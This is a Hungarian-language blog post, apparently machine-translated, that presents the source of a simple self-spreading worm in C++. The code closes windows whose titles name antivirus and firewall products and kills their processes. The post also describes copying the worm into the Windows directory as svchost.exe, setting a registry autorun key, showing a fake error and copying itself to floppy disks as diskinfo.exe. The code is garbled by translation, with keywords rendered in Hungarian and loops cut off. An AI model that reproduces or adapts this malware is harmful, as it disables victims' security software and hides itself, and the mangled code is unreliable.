Egy egyszerű memória-rezidens féreg c »informatív blog
Egy egyszerű memória-rezidens féreg C ++
Virus, mint olyan nehéz, hogy hívja, nem más, mint másolás floppy lemezre, hogy nem. De a munkát végezték, a dicsőség. Menjünk.
Amikor megkapta a fájlkezelő, a keresést az összes aktív ablak címét tartalmazó mondatok:
Norton "" AVP "" Anti "" Vir "" McAfee "" anti "" vir "" tűzfal "
És zárja be őket. Nem volt nehéz. És a legtöbb haszontalan, mert nem ismeri fel, mint egy vírus. De nézd meg, hogy lehetséges, hogy rendkívül érdekes.
BOOL BadWindow (LPSTR strWindow)
BOOL res = FALSE;
A (int i = 0; i
visszatérés res;
>
BOOL CALLBACK WndEnumProcMine (HWND hwnd1, hosszú l1)
LPTSTR str1 = új char [255];
GetWindowText (hwnd1, str1,255);
if (BadWindow (str1))
DWORD dwProcessId;
GetWindowThreadProcessId (hwnd1, dwProcessId);
if (dwProcessId! = GetCurrentProcessId ())
FOGANTYÚ hProcess = OpenProcess (PROCESS_ALL_ACCESS, HAMIS, dwProcessId);
TerminateProcess (hProcess, 0);
CloseHandle (hProcess);
>
>
törölni str1;
return true;
>
érvényteleníti EnumProcessesOther ()
LParam c = 0;
EnumWindows ((WNDENUMPROC) WndEnumProcMine, c);
>
Követve a hatás meglehetősen predugadyvaemy.
Másolja a Windows rendszer neve alatt svchost.exe, és hagyja el a beleket a registry-ben, hogy indul reboot.
int APIENTRY WinMain (HINSTANCE HINSTANCE, HINSTANCE hPrevInstance, LPSTR pCmdLine, int nCmdShow)
char myname [1024], windir [1024];
HKEY HKEY;
SetErrorMode (SEM_NOGPFAULTERRORBOX);
PeekMessage (NULL, NULL, NULL, NULL, NULL);
GetModuleFileName (HINSTANCE, myname, sizeof (myname));
GetWindowsDirectory (windir, sizeof (windir));
Ezt mutatja egy hamis hibaüzenetet. És egy újraindítás után lóg a memóriában, és minden 30.000 ezredmásodperc kerül rögzítésre a floppy lemez néven diskinfo.exe. Meglepő egyszerű vírus, nem igaz? Nem kár, csak a terjedését. De egy egyéni felvételi kulcsot, és szerencsétlen név svchost.exe fájlt be a csikorgó megállt még a legtapasztaltabb ASIC / adminok. Úgy tűnik, hogy nincs felesleges folyamatokat, és ez. Palilos ez elég egyszerű.